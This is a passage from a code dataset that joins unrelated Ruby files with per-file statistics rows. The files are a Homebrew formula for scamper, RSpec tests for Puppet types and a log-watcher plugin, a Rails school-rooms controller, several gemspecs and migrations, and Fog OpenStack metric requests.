      @chain.flatten!
      self
    end

    # See Parametric#visit — propagates the parameter visitor to every child.
    def visit(params)
      super params
      @chain.each { |child| child.visit(params) }
    end

    # See Parametric#has_empty_param? — true when this stage or any sub-stage
    # is missing a parameter.
    # (Replaced the `or` keyword with `||` to avoid precedence surprises.)
    def has_missing_parameter?
      @chain.reduce(super) { |acc, substage| acc || substage.has_missing_parameter? }
    end

    # Renders the full sout option, e.g. `:sout="#transcode{...}:std{...}"`;
    # returns "" when the chain is empty. (Dropped the original's unused
    # `res` local — the string expression itself is the return value.)
    def fragment
      return "" if @chain.empty?
      ":sout=\"##{@chain.map(&:fragment).join(':')}\""
    end
  end
end
| 19.068182 | 87 | 0.585221 |
03db15e10498386c066d153eb2b0d0bab8241560 | 860 | class Scamper < Formula
desc "Advanced traceroute and network measurement utility"
homepage "https://www.caida.org/tools/measurement/scamper/"
url "https://www.caida.org/tools/measurement/scamper/code/scamper-cvs-20161204a.tar.gz"
sha256 "78eeabed8a4161a2238d02dac4c4361c9fb78f53d52fd8dd4bdb27434b512038"

# Pre-built binary bottles for the macOS releases current at the time.
bottle do
  cellar :any
  sha256 "626e7d78b4c32c7f8d3c78ae13951767fd4a60be78ad517e01768d36c07df076" => :sierra
  sha256 "0858a7f973b612a47adc86eaf03c37ce41a1520afe0501315636e1be64da9b48" => :el_capitan
  sha256 "7b7b9d125411ca05a453c00bad2268085732e0e5e1bd8e48b7d30d6a8b789631" => :yosemite
end

# pkg-config is only needed at build time; openssl is a runtime dependency.
depends_on "pkg-config" => :build
depends_on "openssl"
# Standard autotools build installed under the formula prefix.
def install
  system "./configure", "--disable-debug", "--disable-dependency-tracking",
         "--prefix=#{prefix}"
  system "make", "install"
end
end
| 37.391304 | 92 | 0.753488 |
039f2bdf137b15dea0bfcfd8b0da69c65e37851f | 2,138 | require 'spec_helper'
describe 'fake' do
let :title do
'foo'
end
it { should be_valid_type }
# Generates, per attribute category, examples asserting that the matcher
# rejects undeclared names (baddies) and accepts declared ones (goodies).
describe 'tests of the types' do
  {
    :parameters =>
      {:baddies => ['one', 'two'], :goodies => ['three', 'four']},
    :properties =>
      {:baddies => ['five', 'fix'], :goodies => ['seven', 'eight']},
    :features =>
      {:baddies => ['nine', 'ten'], :goodies => ['eleven', 'twelve']}
  }.each do |k, v|
    describe "#{k} checks" do
      # Exercise both the array form and a single bare string.
      # NOTE(review): `baddies.size` on the bare-string case counts characters,
      # so the example name reads e.g. "3 baddies" for one string — cosmetic.
      [v[:baddies], v[:baddies].first].each do |baddies|
        it "should fail for #{baddies.size} baddies" do
          expect do
            should be_valid_type.send("with_#{k}".to_sym, baddies)
          end.to raise_error(
            RSpec::Expectations::ExpectationNotMetError,
            /Invalid #{k}: #{Array(baddies).join(',')}/
          )
        end
      end

      [v[:goodies], v[:goodies].first].each do |goodies|
        it "should pass with #{goodies.size} goodies" do
          should be_valid_type.send("with_#{k}".to_sym, goodies)
        end
      end
    end
  end
end
# These examples instantiate the resource (via the implicit subject) with
# `params` and check provider matching and attribute validation.
describe 'tests that create a resource instance' do
  let :params do
    { :three => 'value' }
  end

  it 'should pass when providers match' do
    should be_valid_type.with_provider(:default)
  end

  it 'should fail when provider does not match' do
    expect do
      should be_valid_type.with_provider(:non_matching)
    end.to raise_error(
      RSpec::Expectations::ExpectationNotMetError,
      /Expected provider: non_matching does not match: default/
    )
  end

  # NOTE(review): exact duplicate of the first example (same description and
  # body); RSpec will run it twice — probably a copy/paste leftover.
  it 'should pass when providers match' do
    should be_valid_type.with_provider(:default)
  end

  it 'should fail with invalid parameters' do
    expect do
      should be_valid_type.with_set_attributes(
        :four => 'three'
      )
    end.to raise_error(
      Puppet::Error,
      /Valid values match \/\(one\|two\)\//
    )
  end

  it 'should not fail with valid parameters' do
    should be_valid_type.with_set_attributes(
      :four => 'one'
    )
  end
end
end
| 23.755556 | 71 | 0.566885 |
e81475589a0aa4c378844677e650f9a4723ed74b | 2,284 | require File.dirname(__FILE__) + '/../spec/spec_helper'
require File.dirname(__FILE__) + '/log_watcher_advanced'
# Unit specs for LogWatcherAdvanced. The plugin shells out (via eval of
# backtick strings) to size the watched file with `wc -c`, then streams the
# newly appended bytes through the configured value/error pipe commands.
describe LogWatcherAdvanced do
  it "should execute for the first time with no file scan" do
    last_run, memory, options = Time.now-3*60, {}, {}
    plugin = LogWatcherAdvanced.new(last_run, memory, options)
    plugin.should_receive(:option).with(:log_path).and_return('/var/log/my.log')
    plugin.should_receive(:option).with(:service_name).and_return('MyService')
    plugin.should_receive(:option).with(:value_pipe).and_return('value_pipe')
    plugin.should_receive(:option).with(:error_pipe).and_return('error_pipe')
    # On the first run only the file size is recorded; nothing is piped yet,
    # so the reported value is 0.
    plugin.should_receive(:eval).once.with(%Q[`wc -c /var/log/my.log`]).and_return("0 /var/log/my.log")
    plugin.build_report
    # Flatten the reports array-of-hashes into a single hash for assertions.
    @report_hash = plugin.data_for_server[:reports].inject({}){|r,d|r.merge!(d)}
    @report_hash[:value].should == 0
  end

  it "should execute the second time with the right value and error command" do
    last_run, memory, options = Time.now-3*60, {}, {}
    # Simulate a previous run that recorded offset 0.
    memory[:last_run] = 0
    plugin = LogWatcherAdvanced.new(last_run, memory, options)
    plugin.should_receive(:option).with(:log_path).and_return('/var/log/my.log')
    plugin.should_receive(:option).with(:service_name).and_return('MyService')
    plugin.should_receive(:option).with(:value_pipe).and_return('value_pipe')
    plugin.should_receive(:option).with(:error_pipe).and_return('error_pipe')
    # The three eval calls must happen in order: size the file, pipe the new
    # bytes through the value command, then through the error command.
    eval_run_count = 0
    plugin.should_receive(:eval).exactly(3).times do |params|
      case eval_run_count+=1
      when 1
        params.should == %Q[`wc -c /var/log/my.log`]
        "10 /var/log/my.log"
      when 2
        params.should == %Q[`tail -c +0 /var/log/my.log | head -c 10 | value_pipe`]
        "value_result"
      when 3
        params.should == %Q[`tail -c +0 /var/log/my.log | head -c 10 | error_pipe`]
        "error_result"
      end
    end
    # Error-pipe output triggers an alert built from that output.
    plugin.should_receive(:build_alert).with('error_result').and_return('build_alert_result')
    plugin.should_receive(:alert).with('build_alert_result', "")
    plugin.build_report
    @report_hash = plugin.data_for_server[:reports].inject({}){|r,d|r.merge!(d)}
    @report_hash[:value].should == "value_result"
  end
end
bf08c15139356237d9b872ae87a9bb5a89f2c614 | 3,009 | # frozen_string_literal: true
# Controller that manages CRUD and search for SchoolRoom records (classes
# offered for a discipline). Coordinators (permission level 1) are scoped to
# their own department; user-facing flash messages are in Portuguese.
class SchoolRoomsController < ApplicationController
  before_action :logged_in?
  # Index is public to logged-in users; all mutating actions require a
  # coordinator.
  before_action :authenticate_coordinator?, except: [:index]

  def new
    @school_room = SchoolRoom.new
    @all_courses = Course.all
  end

  def create
    @school_room = SchoolRoom.new(school_rooms_params)
    # School room names are stored upper-cased.
    @school_room.name.upcase!
    @all_courses = Course.all
    if @school_room.save
      redirect_to school_rooms_index_path, flash: { success: 'Turma criada' }
    else
      # ocurred_errors presumably copies model errors into flash — defined
      # elsewhere; TODO confirm.
      ocurred_errors(@school_room)
      render :new
    end
  end

  def edit
    @school_room = SchoolRoom.find(params[:id])
    @all_courses = Course.all
  end

  def index
    # permission / department_by_coordinator come from shared helpers not
    # visible here; level 1 appears to mean "coordinator".
    if permission[:level] == 1
      @my_school_rooms = SchoolRoom.joins(:discipline).merge(
        Discipline.order(:name).where(department_id: department_by_coordinator)
      ).order(:name)
      @disciplines = discipline_of_department(department_by_coordinator)
                     .order(:name)
                     .map(&:name)
    else
      @my_school_rooms = SchoolRoom.all
    end
    @my_school_rooms = @my_school_rooms.paginate(page: params[:page], per_page: 10)
    # needs refactoring
    # sort_school_rooms_by_allocation
  end

  # Finds school rooms whose discipline name matches the submitted search
  # term (within the coordinator's department).
  def search_disciplines
    @search_attribute = params[:current_search][:search]
    @disciplines = discipline_of_department(department_by_coordinator).where(
      'name LIKE :search', search: "%#{@search_attribute}%"
    ).order(:name)
    if @disciplines.present?
      @school_rooms = school_rooms_of_disciplines(@disciplines)
    else
      flash[:notice] = 'Nenhuma turma encontrada'
      redirect_to school_rooms_index_path
    end
  end

  # Returns the course matching the given code as JSON (AJAX endpoint).
  def search_courses
    require 'json'
    search_param = params[:code]
    courses = Course.find_by(code: search_param)
    render inline: courses.to_json
  end

  def update
    @school_room = SchoolRoom.find(params[:id])
    @all_courses = Course.all
    # Note: the name attribute is intentionally absent from the update
    # params (see school_rooms_params_update).
    if @school_room.update_attributes(school_rooms_params_update)
      success_message = 'A turma foi alterada com sucesso'
      redirect_to school_rooms_index_path, flash: { success: success_message }
    else
      ocurred_errors(@school_room)
      render :edit
    end
  end

  def destroy
    @school_room = SchoolRoom.find(params[:id])
    coordinator = Coordinator.find_by(user_id: current_user.id)
    # Only a coordinator of the same department as the room's discipline may
    # delete it.
    if permission[:level] == 1 &&
       coordinator.course.department == @school_room.discipline.department
      @school_room.destroy
      flash[:success] = 'A turma foi excluída com sucesso'
    else
      flash[:error] = 'Permissão negada'
    end
    redirect_to school_rooms_index_path
  end

  private

  # Strong parameters for create (includes :name).
  def school_rooms_params
    params[:school_room].permit(
      :name,
      :discipline_id,
      :vacancies,
      course_ids: [],
      category_ids: []
    )
  end

  # Strong parameters for update — :name is deliberately not permitted.
  def school_rooms_params_update
    params[:school_room].permit(
      :discipline_id,
      :vacancies,
      course_ids: [],
      category_ids: []
    )
  end
end
| 26.628319 | 83 | 0.684945 |
1afbc542933870c388497cdb4ca1ba402c5ee828 | 1,791 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/cloud/functions/v1/version", __dir__)
# Gem packaging metadata for the generated Cloud Functions V1 client.
Gem::Specification.new do |gem|
  gem.name = "google-cloud-functions-v1"
  gem.version = Google::Cloud::Functions::V1::VERSION

  gem.authors = ["Google LLC"]
  gem.email = "[email protected]"
  gem.description = "The Cloud Functions API manages lightweight user-provided functions executed in response to events. Note that google-cloud-functions-v1 is a version-specific client library. For most uses, we recommend installing the main client library google-cloud-functions instead. See the readme for more details."
  gem.summary = "API Client library for the Cloud Functions V1 API"
  gem.homepage = "https://github.com/googleapis/google-cloud-ruby"
  gem.license = "Apache-2.0"

  gem.platform = Gem::Platform::RUBY

  # Ship all tracked lib/ and proto_docs/ files plus the top-level docs.
  gem.files = `git ls-files -- lib/*`.split("\n") +
              `git ls-files -- proto_docs/*`.split("\n") +
              ["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
  gem.require_paths = ["lib"]

  gem.required_ruby_version = ">= 2.5"

  gem.add_dependency "gapic-common", "~> 0.4"
  gem.add_dependency "google-cloud-errors", "~> 1.0"
  gem.add_dependency "grpc-google-iam-v1", ">= 0.6.10", "< 2.0"

  gem.add_development_dependency "google-style", "~> 1.25.1"
  gem.add_development_dependency "minitest", "~> 5.14"
  gem.add_development_dependency "minitest-focus", "~> 1.1"
  gem.add_development_dependency "minitest-rg", "~> 5.2"
  gem.add_development_dependency "rake", ">= 12.0"
  gem.add_development_dependency "redcarpet", "~> 3.0"
  gem.add_development_dependency "simplecov", "~> 0.18"
  gem.add_development_dependency "yard", "~> 0.9"
end
| 45.923077 | 325 | 0.670017 |
ac7c9cdf88246696f98712c83658d0564d4b3139 | 157 | # frozen_string_literal: true
# Error types raised by the Sauce bindings.
module SauceBindings
  # Raised when an operation requires a Sauce session that was never started.
  SessionNotStartedError = Class.new(RuntimeError)

  # Raised when the configured platform combination is not valid.
  InvalidPlatformError = Class.new(RuntimeError)
end
| 19.625 | 50 | 0.821656 |
87776d33e2d237319ea342fe4a795f227b4aaa08 | 704 | # frozen_string_literal: true
require 'uploadcare'
module Uploadcare
  module Param
    # Builds the User-Agent header value used to track libraries calling the
    # Uploadcare API.
    class UserAgent
      # Generate the header from the gem's config.
      #
      # Optional +framework_data+ from the config is appended as
      # "; <framework_data>"; when blank, nothing is appended.
      #
      # @example Uploadcare::Param::UserAgent.call
      #   UploadcareRuby/3.0.0-dev/Pubkey_(Ruby/2.6.3;UploadcareRuby)
      def self.call
        framework_data = Uploadcare.config.framework_data || ''
        # Use the normalized local value instead of re-reading the config:
        # a second read could return nil and break the concatenation.
        framework_data_string = "; #{framework_data}" unless framework_data.empty?
        public_key = Uploadcare.config.public_key
        "UploadcareRuby/#{VERSION}/#{public_key} (Ruby/#{RUBY_VERSION}#{framework_data_string})"
      end
    end
  end
end
| 32 | 100 | 0.698864 |
18ce6672d148038dc1e1aadbdabd66c0adec62da | 493 | # frozen_string_literal: true
module Types
  module Notes
    # GraphQL input type for a position within a diff; adds the old/new line
    # arguments on top of the fields inherited from the base input type.
    class DiffPositionInputType < DiffPositionBaseInputType
      graphql_name 'DiffPositionInput'

      # Argument descriptions are copied from the corresponding output type
      # to keep the two definitions in sync.
      argument :old_line, GraphQL::Types::Int, required: false,
               description: copy_field_description(Types::Notes::DiffPositionType, :old_line)
      argument :new_line, GraphQL::Types::Int, required: false,
               description: copy_field_description(Types::Notes::DiffPositionType, :new_line)
    end
  end
end
| 32.866667 | 93 | 0.726166 |
87558d3b2d5c4b5ee84ad3912c129b04c1256b56 | 599 | # frozen_string_literal: true
module LedgerSync
  module Domains
    class Operation
      # Base class for resource operations: resolves the resource class the
      # operation acts on from the operation class's own namespace.
      class Resource
        include LedgerSync::Domains::Operation::Mixin

        # Memoized resource class inferred from this class's name.
        def resource_class
          @resource_class ||= inferred_resource_class
        end

        private

        # Example: Some::App::Users::FindOperation drops the operation
        # segment, singularizes the pluralized resource module segment, and
        # resolves Some::App::User.
        def inferred_resource_class
          *namespace, resource_module, _operation = self.class.to_s.split('::')
          constant_path = (namespace + [resource_module.singularize]).join('::')
          self.class.const_get(constant_path)
        end
      end
    end
  end
end
| 23.038462 | 75 | 0.632721 |
f800911ccc97fb8d7c0d8bb3bc2982930c4eabb4 | 1,703 | require 'cucumber/formatter/pretty'
module Cucumber
  module Cli
    # Pretty-formatter subclass used by the CLI help commands to print the
    # table of supported spoken languages (--i18n) and the keyword table for
    # a single language, with incomplete translations highlighted.
    class LanguageHelpFormatter < Formatter::Pretty
      # Banner shown (in "failed" color) above a keyword table whose
      # translation is missing newer grammar words.
      INCOMPLETE = %{
The Cucumber grammar has evolved since this translation was written.
Please help us complete the translation by translating the missing words in

#{Cucumber::LANGUAGE_FILE}

Then contribute back to the Cucumber project. Details here:
http://wiki.github.com/aslakhellesoy/cucumber/spoken-languages
}

      # Prints one row per language: code, English name, native name.
      def self.list_languages(io)
        raw = Cucumber::LANGUAGES.keys.sort.map do |lang|
          [lang, Cucumber::LANGUAGES[lang]['name'], Cucumber::LANGUAGES[lang]['native']]
        end
        table = Ast::Table.new(raw)
        new(nil, io, {:check_lang=>true}, '').visit_multiline_arg(table, :passed)
      end

      # Prints one row per keyword key with its translation in +lang+.
      def self.list_keywords(io, lang)
        raw = Cucumber::KEYWORD_KEYS.map do |key|
          [key, Cucumber::LANGUAGES[lang][key]]
        end
        table = Ast::Table.new(raw)
        new(nil, io, {:incomplete => Cucumber.language_incomplete?(lang)}, '').visit_multiline_arg(table, :passed)
      end

      # Emits the INCOMPLETE banner before the table when requested.
      def visit_multiline_arg(table, status)
        if @options[:incomplete]
          @io.puts(format_string(INCOMPLETE, :failed))
        end
        super
      end

      # Reset the column counter at the start of each row.
      def visit_table_row(table_row, status)
        @col = 1
        super
      end

      # Column 1 holds the language/keyword key and is rendered in comment
      # style; when listing languages, it also flags whether the row's
      # translation is incomplete so the remaining cells render as failed.
      def visit_table_cell_value(value, width, status)
        if @col == 1
          if(@options[:check_lang])
            @incomplete = Cucumber.language_incomplete?(value)
          end
          status = :comment
        elsif @incomplete
          status = :failed
        end

        @col += 1
        super(value, width, status)
      end
    end
  end
end
6a797744b39b5ba420a04161cecbaa77df15a899 | 472 | class User < ApplicationRecord
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable, :trackable and :omniauthable
  devise :database_authenticatable, :invitable,
         :recoverable, :rememberable, :validatable

  # Integer-backed role column; the hash form makes the value mapping
  # explicit (equivalent to the positional array form).
  enum role: { admin: 0, operator: 1 }

  # Records this user has created.
  has_many :facilities, inverse_of: :author
  has_many :patients, inverse_of: :author
  has_many :visits, inverse_of: :author

  validates :role, presence: true
end
| 26.222222 | 71 | 0.726695 |
ed4e641d91af3d93b682629b0642f3f1ea60e42a | 42 | class BatchEvent < ActiveRecord::Base
  # Plain persistence model for batch events; all behavior comes from the
  # database schema (no custom logic defined here).
end
| 14 | 37 | 0.809524 |
4ab664bd13b4bc53499f1befcea8ccb544590f8e | 45 | module FrozenRecord
  # Gem version, consumed by the gemspec.
  VERSION = '0.16.0'
end
| 11.25 | 20 | 0.711111 |
f8414252cecf77c22b6f22e24a04eed01d6a6ee7 | 2,522 | # -*- encoding: utf-8 -*-
# stub: logstash-input-http 3.0.5 ruby lib
# Installed gemspec stub for logstash-input-http 3.0.5 (auto-generated by
# RubyGems at install time; edit the plugin's source gemspec instead).
Gem::Specification.new do |s|
  s.name = "logstash-input-http"
  s.version = "3.0.5"

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.metadata = { "logstash_group" => "input", "logstash_plugin" => "true" } if s.respond_to? :metadata=
  s.require_paths = ["lib"]
  s.authors = ["Elastic"]
  s.date = "2017-06-23"
  s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
  s.email = "[email protected]"
  s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
  s.licenses = ["Apache License (2.0)"]
  s.rubygems_version = "2.4.8"
  s.summary = "Logstash Input plugin that receives HTTP requests"
  s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version

  if s.respond_to? :specification_version then
    s.specification_version = 4

    # All three branches declare the same dependency list; which setter is
    # used depends on the RubyGems version loading this spec.
    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_runtime_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
      s.add_runtime_dependency(%q<logstash-codec-plain>, [">= 0"])
      s.add_runtime_dependency(%q<stud>, [">= 0"])
      s.add_runtime_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
      s.add_runtime_dependency(%q<rack>, ["~> 1"])
      s.add_development_dependency(%q<logstash-devutils>, [">= 0"])
      s.add_development_dependency(%q<logstash-codec-json>, [">= 0"])
      s.add_development_dependency(%q<ftw>, [">= 0"])
    else
      s.add_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
      s.add_dependency(%q<logstash-codec-plain>, [">= 0"])
      s.add_dependency(%q<stud>, [">= 0"])
      s.add_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
      s.add_dependency(%q<rack>, ["~> 1"])
      s.add_dependency(%q<logstash-devutils>, [">= 0"])
      s.add_dependency(%q<logstash-codec-json>, [">= 0"])
      s.add_dependency(%q<ftw>, [">= 0"])
    end
  else
    s.add_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
    s.add_dependency(%q<logstash-codec-plain>, [">= 0"])
    s.add_dependency(%q<stud>, [">= 0"])
    s.add_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
    s.add_dependency(%q<rack>, ["~> 1"])
    s.add_dependency(%q<logstash-devutils>, [">= 0"])
    s.add_dependency(%q<logstash-codec-json>, [">= 0"])
    s.add_dependency(%q<ftw>, [">= 0"])
  end
end
| 45.854545 | 201 | 0.626883 |
18c70de5bf6621e1768c3adbc1cd5f308f157163 | 317 | # frozen_string_literal: true
class RemoveDefaultsFromCardSetsColumns < ActiveRecord::Migration[5.2]
  # Drops the '' default from each card_sets string column so new rows must
  # supply a value explicitly (columns now default to NULL).
  def change
    %i[name slug code].each do |column|
      change_column_default(:card_sets, column, from: '', to: nil)
    end
  end
end
| 31.7 | 70 | 0.725552 |
1c39c58dd978904541a5c8210db7ddac6f0c40ca | 295 | # frozen_string_literal: true
class SorceryCore < ActiveRecord::Migration[4.2]
  # Core Sorcery authentication schema: users identified by a unique email,
  # with salted + hashed password columns.
  def change
    create_table :users do |t|
      t.string :email, null: false
      t.string :crypted_password
      t.string :salt

      t.timestamps
    end

    add_index :users, :email, unique: true
  end
end
| 18.4375 | 48 | 0.667797 |
ab0e6db4c4656442131e96034a0e833b8a4ad796 | 2,415 | # frozen_string_literal: true
module HealthQuest
  module Resource
    ##
    # A service object for isolating dependencies from the resource controller.
    #
    # @!attribute session_service
    #   @return [HealthQuest::Lighthouse::Session]
    # @!attribute user
    #   @return [User]
    # @!attribute query
    #   @return [Query]
    # @!attribute resource_identifier
    #   @return [String]
    # @!attribute options_builder
    #   @return [Shared::OptionsBuilder]
    #
    class Factory
      attr_reader :session_service, :user, :query, :resource_identifier, :options_builder

      ##
      # Builds a Factory instance from a given User
      #
      # @param user [User] the currently logged in user.
      # @return [Factory] an instance of this class
      #
      def self.manufacture(opts = {})
        new(opts)
      end

      # Wires up the Lighthouse session and the Query object for the given
      # user/api/resource_identifier options.
      def initialize(opts)
        @user = opts[:user]
        @resource_identifier = opts[:resource_identifier]
        @session_service = HealthQuest::Lighthouse::Session.build(user: user, api: opts[:api])
        @query = Query.build(session_store: session_service.retrieve,
                             api: opts[:api],
                             resource_identifier: resource_identifier)
        @options_builder = Shared::OptionsBuilder
      end

      ##
      # Gets the resource by it's unique ID
      #
      # @param id [String] a unique string value
      # @return [FHIR::ClientReply]
      #
      def get(id) # rubocop:disable Rails/Delegate
        query.get(id)
      end

      ##
      # Gets resources from a given set of key/values
      #
      # @param filters [Hash] the set of query options.
      # @return [FHIR::ClientReply] an instance of ClientReply
      #
      def search(filters = {})
        # NOTE: merge! mutates the caller-supplied filters hash.
        filters.merge!(resource_name)
        with_options = options_builder.manufacture(user, filters).to_hash
        query.search(with_options)
      end

      ##
      # Create a resource for the logged in user.
      #
      # @param data [Hash] data submitted by the user.
      # @return [FHIR::ClientReply] an instance of ClientReply
      #
      def create(data)
        query.create(data, user)
      end

      ##
      # Builds the key/value pair for identifying the resource
      #
      # @return [Hash] a key value pair
      #
      def resource_name
        { resource_name: resource_identifier }
      end
    end
  end
end
| 28.081395 | 94 | 0.601656 |
014797b1a23c5ee601532f27adc1c1ca20aa15a8 | 127 | class RemoveUserIdFromRating < ActiveRecord::Migration
def change
remove_column :ratings, :user_id, :reference
end
end
| 21.166667 | 54 | 0.779528 |
91dbc33bb52051cc8792c06877116565590e7f88 | 1,168 | module Fog
  module OpenStack
    class Metric
      class Real
        # GET the measures recorded for +metric_name+ on a generic resource;
        # +options+ is forwarded verbatim as the query string (e.g.
        # aggregation/time-range filters).
        def get_resource_metric_measures(resource_id, metric_name, options = {})
          request(
            :expects => 200,
            :method => 'GET',
            :path => "resource/generic/#{resource_id}/metric/#{metric_name}/measures",
            :query => options
          )
        end
      end

      class Mock
        # Canned response for tests. Each entry appears to be a
        # [timestamp, granularity, value] triple (NOTE(review): field
        # meaning inferred from the Gnocchi measures format — confirm).
        def get_resource_metric_measures(_resource_id, _metric_name, _options = {})
          response = Excon::Response.new
          response.status = 200
          response.body = [
            [
              "2014-10-06T14:00:00+00:00",
              3600.0,
              24.7
            ],
            [
              "2014-10-06T14:34:00+00:00",
              60.0,
              15.5
            ],
            [
              "2014-10-06T14:34:12+00:00",
              1.0,
              6.0
            ],
            [
              "2014-10-06T14:34:20+00:00",
              1.0,
              25.0
            ]
          ]
          response
        end
      end
    end
  end
end
| 24.851064 | 91 | 0.385274 |
87708e8a11e0bed5b3a9487db41943bcfe89cf3f | 133 | class AddUserToRsvp < ActiveRecord::Migration
  # Adds rsvps.user_id with an index and a database-level foreign key to users.
  def change
    add_reference :rsvps, :user, index: true, foreign_key: true
  end
end
| 22.166667 | 63 | 0.75188 |
1df2e264d138160336a846397ef86e1ce5ced46c | 3,772 | # frozen_string_literal: true
require "set"
require "active_support/core_ext/module/attribute_accessors"
require "active_support/dependencies/interlock"
module ActiveSupport # :nodoc:
  module Dependencies # :nodoc:
    require_relative "dependencies/require_dependency"

    extend self

    # Pristine Module#name, captured before any user code can override
    # #name; used by real_mod_name below.
    UNBOUND_METHOD_MODULE_NAME = Module.instance_method(:name)
    private_constant :UNBOUND_METHOD_MODULE_NAME

    mattr_accessor :interlock, default: Interlock.new

    # :doc:

    # Execute the supplied block without interference from any
    # concurrent loads.
    def self.run_interlock
      Dependencies.interlock.running { yield }
    end

    # Execute the supplied block while holding an exclusive lock,
    # preventing any other thread from being inside a #run_interlock
    # block at the same time.
    def self.load_interlock
      Dependencies.interlock.loading { yield }
    end

    # Execute the supplied block while holding an exclusive lock,
    # preventing any other thread from being inside a #run_interlock
    # block at the same time.
    def self.unload_interlock
      Dependencies.interlock.unloading { yield }
    end

    # :nodoc:

    # True if +path+ was registered as an eager load path during bootstrap.
    def eager_load?(path)
      Dependencies._eager_load_paths.member?(path)
    end

    # The set of directories from which we may automatically load files. Files
    # under these directories will be reloaded on each request in development mode,
    # unless the directory also appears in autoload_once_paths.
    mattr_accessor :autoload_paths, default: []

    # The set of directories from which automatically loaded constants are loaded
    # only once. All directories in this set must also be present in +autoload_paths+.
    mattr_accessor :autoload_once_paths, default: []

    # This is a private set that collects all eager load paths during bootstrap.
    # Useful for Zeitwerk integration. Its public interface is the config.* path
    # accessors of each engine.
    mattr_accessor :_eager_load_paths, default: Set.new

    # An array of qualified constant names that have been loaded. Adding a name
    # to this array will cause it to be unloaded the next time Dependencies are
    # cleared.
    mattr_accessor :autoloaded_constants, default: []

    # Intentionally a no-op here (NOTE(review): presumably retained so
    # callers of Dependencies.clear keep working — confirm).
    def clear
    end

    # Is the provided constant path defined?
    def qualified_const_defined?(path)
      Object.const_defined?(path, false)
    end

    # Search for a file in autoload_paths matching the provided suffix.
    def search_for_file(path_suffix)
      path_suffix += ".rb" unless path_suffix.end_with?(".rb")

      autoload_paths.each do |root|
        path = File.join(root, path_suffix)
        return path if File.file? path
      end
      nil # Gee, I sure wish we had first_match ;-)
    end

    # Determine if the given constant has been automatically loaded.
    def autoloaded?(desc)
      return false if desc.is_a?(Module) && real_mod_name(desc).nil?
      name = to_constant_name desc
      return false unless qualified_const_defined?(name)
      autoloaded_constants.include?(name)
    end

    # Convert the provided const desc to a qualified constant name (as a string).
    # A module, class, symbol, or string may be provided.
    def to_constant_name(desc) # :nodoc:
      case desc
      when String then desc.delete_prefix("::")
      when Symbol then desc.to_s
      when Module
        real_mod_name(desc) ||
          raise(ArgumentError, "Anonymous modules have no name to be referenced by")
      else raise TypeError, "Not a valid constant descriptor: #{desc.inspect}"
      end
    end

    private
      # Returns the original name of a class or module even if `name` has been
      # overridden.
      def real_mod_name(mod)
        UNBOUND_METHOD_MODULE_NAME.bind_call(mod)
      end
  end
end
| 33.380531 | 86 | 0.711559 |
f7a706c8daa58c7f133f419bf2094b5b2b0d78f0 | 2,439 | class Service::FogBugz < Service::Base
title 'FogBugz'
string :project_url, :placeholder => "https://yourproject.fogbugz.com",
:label => 'URL to your FogBugz project:'
string :api_token, :placeholder => 'API Token',
:label => 'Your FogBugz API Token.'
page 'API Token', [:project_url, :api_token]
# Create an issue
def receive_issue_impact_change(config, payload)
http.ssl[:verify] = true
post_body = {
:sTitle => "#{payload[:title]} [Crashlytics]",
:sEvent => build_case_event(payload)
}
response = http_post fogbugz_url(:cmd => 'new') do |req|
req.body = post_body
end
fogbugz_case, error = parse_response(response, 'response/case')
if fogbugz_case && !error
{ :fogbugz_case_number => fogbugz_case.attr('ixBug') }
else
raise "Could not create FogBugz case: Response: #{error}"
end
end
def receive_verification(config, _)
http.ssl[:verify] = true
response = http_get fogbugz_url(:cmd => 'listProjects')
project, error = parse_response(response, 'response/projects')
if project && !error
[true, 'Successfully verified Fogbugz settings']
else
if error
log "Received verification failed: Error code #{error.attr('code')} API key: #{config[:api_key]} Response: #{error}"
else
log "Received verification failed: Response: #{error}"
end
[false, 'Oops! Please check your API key again.']
end
end
private
def fogbugz_url(params={})
query_params = params.map { |k,v| "#{k}=#{v}" }.join('&')
"#{config[:project_url]}/api.asp?token=#{config[:api_token]}&#{query_params}"
end
def build_case_event(payload)
users_text = if payload[:impacted_devices_count] == 1
'This issue is affecting at least 1 user who has crashed '
else
"This issue is affecting at least #{payload[:impacted_devices_count]} users who have crashed "
end
crashes_text = if payload[:crashes_count] == 1
'at least 1 time.'
else
"at least #{payload[:crashes_count]} times."
end
<<-EOT
Crashlytics detected a new issue.
#{payload[:title]} in #{payload[:method]}
#{users_text}#{crashes_text}
More information: #{payload[:url]}
EOT
end
def parse_response(response, subject_selector)
xml = Nokogiri.XML(response.body)
error = xml.at('response/error')
subject = xml.at(subject_selector)
[subject, error]
end
end
| 27.404494 | 124 | 0.653137 |
1df1392d247d8ff1d7bc445e79cfc4963a6af3ae | 1,318 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
module Puppet::Parser::Functions
  # hdp_host_attribute(hash, attr, source): look up +attr+ for the host
  # key(s) +source+ in +hash+. Returns "" when the host entry or the
  # attribute is empty/missing; maps over +source+ when it is an array.
  newfunction(:hdp_host_attribute, :type => :rvalue) do |args|
    args = function_hdp_args_as_array(args)
    hash,attr,source = args
    # Resolve a single host: hash[s][attr], defaulting to "" at either level.
